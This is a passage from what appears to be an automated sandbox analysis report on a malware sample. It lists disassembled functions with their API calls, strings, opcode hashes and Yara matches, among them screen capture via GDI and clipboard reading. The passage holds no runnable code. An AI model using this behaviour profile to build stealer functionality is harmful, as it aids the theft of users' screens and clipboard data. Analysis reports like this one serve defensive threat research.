                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c692fef42be145deae4456ee4ac28b6ac25c621fa9d6ff9ed2ae3db28027d6d
                                              • Instruction ID: bc1441c736d092f3f27a08f7ef17a15652b1e94d70ae04ea701d7088df2cc72e
                                              • Opcode Fuzzy Hash: 2c692fef42be145deae4456ee4ac28b6ac25c621fa9d6ff9ed2ae3db28027d6d
                                              • Instruction Fuzzy Hash: DFB09238F850068B8208CF08D8A1474E3B1F74F219B4575388CE3E3290CD20D806890C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041FFD9 Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: afd82a99ac755fdc3a533a1e7986aac535729308fea22b07fc31ccd5e3c7b486
                                              • Instruction ID: 8a4a371dd7c1786c8fe760e8e08cf405fa5077d2ebc488ab8bf478ce10c7892f
                                              • Opcode Fuzzy Hash: afd82a99ac755fdc3a533a1e7986aac535729308fea22b07fc31ccd5e3c7b486
                                              • Instruction Fuzzy Hash: F7B09239A69040878208DF04EA91830B3B8E7A7304B0430289282E3266CD32E420CA4C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00700245 Relevance: .0, Instructions: 9COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43d8f41d80c62da231521e97de38f51167f84035e5cee915eaced784e260e6d8
                                              • Instruction ID: 3fd801eec03e02d39b20a8ca89e0c86b8ca26c68863f9e599adbbcbbde4db169
                                              • Opcode Fuzzy Hash: 43d8f41d80c62da231521e97de38f51167f84035e5cee915eaced784e260e6d8
                                              • Instruction Fuzzy Hash: D7B012259680404281088F00D851430A238E6A3304F0030284183E3063CC31D020C60C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0070B3F7 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 76windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 0070B405
                                              • GetCurrentObject.GDI32(00000000,00000007), ref: 0070B426
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0070B436
                                              • DeleteObject.GDI32(00000000), ref: 0070B44D
                                              • CreateCompatibleDC.GDI32(00000000), ref: 0070B454
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0070B462
                                              • SelectObject.GDI32(00000000,00000000), ref: 0070B46E
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0070B491
                                              • SelectObject.GDI32(00000000,00000000), ref: 0070B499
                                              • DeleteDC.GDI32(00000000), ref: 0070B4A0
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0070B4A9
                                              • DeleteObject.GDI32(00000000), ref: 0070B4B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object$Delete$CompatibleCreateSelect$BitmapCurrentRelease
                                              • String ID: Qp$Qp
                                              • API String ID: 1725296429-1053766494
                                              • Opcode ID: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
                                              • Instruction ID: f54efbe70d01e80acca420d4f96a3a0cba323340c53da5fefc1411cf757e91d7
                                              • Opcode Fuzzy Hash: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
                                              • Instruction Fuzzy Hash: 98215732504304AFE3009FA09C49F6F7BE8FFC9782F005429FB85922A0D77499018BEA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00700607 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 236COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 007006DA
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0070070E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: V107$_)M/$_-Z3$b%K+
                                              • API String ID: 237503144-3840097723
                                              • Opcode ID: 3ee8f93103cab64fccbfb46bca4c52ffa13883f6957401afda7eb6def4c8019d
                                              • Instruction ID: a7efa8f8316a131e0d765e2df6fd95ea5848b404472b961d0786dcb912936bf8
                                              • Opcode Fuzzy Hash: 3ee8f93103cab64fccbfb46bca4c52ffa13883f6957401afda7eb6def4c8019d
                                              • Instruction Fuzzy Hash: F9A1F2B1140F10CBD32ACF24C5A4B97BBE2BF49B14F504A1DD9AB8BA91D775B406CB84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004203A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 236COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00420473
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 004204A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: V107$_)M/$_-Z3$b%K+
                                              • API String ID: 237503144-3840097723
                                              • Opcode ID: 415396783fcf33fd62c8bdbf907285ad325f08c277288e8db70e6241533ae13a
                                              • Instruction ID: 7466cd2c268fc972bfc07d1a477bb0991477af1b0ae2b0464136dea7a275457c
                                              • Opcode Fuzzy Hash: 415396783fcf33fd62c8bdbf907285ad325f08c277288e8db70e6241533ae13a
                                              • Instruction Fuzzy Hash: C5A10571240F148BD326CF24C6A4B97BBE1FF49714F904A1DD6AB4BA91D774B406CB84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0070B247 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataOpenWire
                                              • String ID:
                                              • API String ID: 1198520892-3916222277
                                              • Opcode ID: cea0a327820102340c8f955b3794ac00dd49388d72f97b56df99a0b6a7389256
                                              • Instruction ID: a5760ecca98f2f97b6b899a5cc04f784dbabe69278403c1bc4f7782556b1a8aa
                                              • Opcode Fuzzy Hash: cea0a327820102340c8f955b3794ac00dd49388d72f97b56df99a0b6a7389256
                                              • Instruction Fuzzy Hash: E541467180C381DBC7109B28848865EFFE0EB96364F591B5DF8E5572D2C3389A49CBA7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041BFE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041C108
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041C139
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: M3
                                              • API String ID: 237503144-1098715678
                                              • Opcode ID: 64ea4e8046676ed8e9fc3ac0e64fc677348dbb62c249d565b03b54e58056c842
                                              • Instruction ID: 11f51877d1175f535d645effb319d41d797b5f81760811a065eadd595d4e7ea0
                                              • Opcode Fuzzy Hash: 64ea4e8046676ed8e9fc3ac0e64fc677348dbb62c249d565b03b54e58056c842
                                              • Instruction Fuzzy Hash: 1551A8B15007009FD724CF29C884B62BBB5EF89314F158A9CE8A68F7A6D734E845CB85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FC247 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 006FC36F
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 006FC3A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: M3
                                              • API String ID: 237503144-1098715678
                                              • Opcode ID: e439e8e007a730ace2bebfbbfbfcc69ded4fd3001a084339053002973a781b8d
                                              • Instruction ID: 9b95a05d8ff8eeb1802c690ea79df6a55cfb5b94723a029bedae6d3e20a841f7
                                              • Opcode Fuzzy Hash: e439e8e007a730ace2bebfbbfbfcc69ded4fd3001a084339053002973a781b8d
                                              • Instruction Fuzzy Hash: E351ADB11007059FD724CF25C994B227BB6FF85324F158A9CE8A68F7A6D775E805CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E9317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety., xrefs: 006E935A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety.
                                              • API String ID: 621844428-3219661580
                                              • Opcode ID: 29dfed9965a319fe24048995b90e2def5f861019178d281272e2979116696abc
                                              • Instruction ID: 3873c90e6ddf8d99e41e70b84b4dec830ba01ecfda84212944379f82dd885a3a
                                              • Opcode Fuzzy Hash: 29dfed9965a319fe24048995b90e2def5f861019178d281272e2979116696abc
                                              • Instruction Fuzzy Hash: FF01A97180B3C0D7C7107BBB9A0E2BE7AA69E91314F20052AF8D2822D1D725554696F7
                                              Uniqueness

                                              Uniqueness Score: -1.00%